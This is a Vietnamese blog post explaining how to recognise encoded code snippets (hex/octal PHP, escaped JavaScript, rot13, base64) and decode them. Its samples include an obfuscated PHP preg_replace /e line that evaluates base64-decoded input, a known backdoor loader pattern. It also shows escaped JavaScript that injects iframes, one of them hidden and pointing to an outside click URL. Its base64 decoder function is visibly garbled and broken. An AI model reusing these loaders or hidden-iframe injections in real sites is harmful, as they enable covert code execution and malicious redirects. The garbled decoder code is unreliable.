Kiểm tra mã hóa code

Website Traffic
Làm sao biết đoạn mã được mã hóa bằng mã gì ?
        Một cách nhận biết nhỏ nhằm gợi ý cho bạn dễ dàng tìm kiếm các công cụ bẻ khoá cho các đoạn code gặp phải. Lưu ý, việc làm này có thể dẫn bạn vướng vào các vấn đề pháp lý.

       Nhờ vào sự giúp đỡ của trang DDecode, bạn có thể biết những loại mã hóa cơ bản được liệt kê dưới đây.

► Nếu bạn gặp đoạn code kiểu như dưới đây, đó là đoạn mã php đã được mã hoá bởi mã Hex và Octa trộn lẫn.
<'? php @preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x69\156\x63\154\x75\144\x65\50
\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\134\x31\42\x29\51\x3b","\x4c\62
\x68\166\x62\127\x55\166\x59\62");
► Nếu bạn gặp đoạn code sau, nó là đoạn JavaScript đã được mã hoá để ấn đi các iframe (Escape Encoding). Bạn có thể vào trang này hoặc trang này để giải mã
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%64%6F%63%73%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%66%69%6C%65%2F%64%2F%30%42%32%4C%38%53%54%30%51%44%76%4F%6A%52%30%74%76%5A%58%5A%33%61%6B%35%70%54%56%6B%2F%70%72%65%76%69%65%77%22%20%77%69%64%74%68%3D%22%36%37%30%22%20%68%65%69%67%68%74%3D%22%34%35%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
► Hoặc đoạn code sau nghĩa là nhiều iframes được mã hoá thông qua chế độ document.write (Escape Encoding).. Bạn có thể vào trang này hoặc trang này để giải mã
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%6C%69%63%6B%2E%6B%38%38%37%37%2E%6F%72%67%2F%66%65%65%64%2F%78%6D%6C%2E%70%68%70%3F%75%69%64%3D%32%33%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%69%66%72%61%'))
► Đoạn code sau là mã hoá của câu "Hello World!" theo chuẩn Root13 Encoding.
function rot13(input){return input.replace(/[a-zA-Z]/g,function(ch){return String.fromCharCode((ch<="Z"?90:122)>=(ch=ch.charCodeAt(0)+13)?ch:ch-26)})}document.write(rot13("Uryyb Jbeyq!"));
► Đoạn code sau là mã hoá của câu "Hello World!" theo chuẩn Base64 Encoding. Bạn có thể dùng trang web này để giải mã.
function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));enc2=
base64.indexOf(input.charAt(i++));enc3=base64.indexOf(input.charAt(i++));enc4=
base64.indexOf(input.charAt(i++));ch1=(enc1<<2 enc2="">>4);ch2=((enc2&15)<<4 enc3="">>2);ch3=((enc3&3)<<6 decode64="" document.write="" enc1="" enc2="" enc3="" enc4="" i="" input.length="" output="" p="" return="" sbg8gv29ybgqh="" while="">
PhP encode - Bạn có thể xem ví dụ về 3 loại code liên quan đến phương thức này ở trang web này. Cách giải mã ở trang web này.

         Các bạn có thể dùng chức năng này tại Thucle' Blog đã tích hợp sẵn cho các bạn rồi :)Cảm ơn các bạn đã ghé thăm và sử dụng dịch vụ của Thucle' Blog

Đăng nhận xét

0 Nhận xét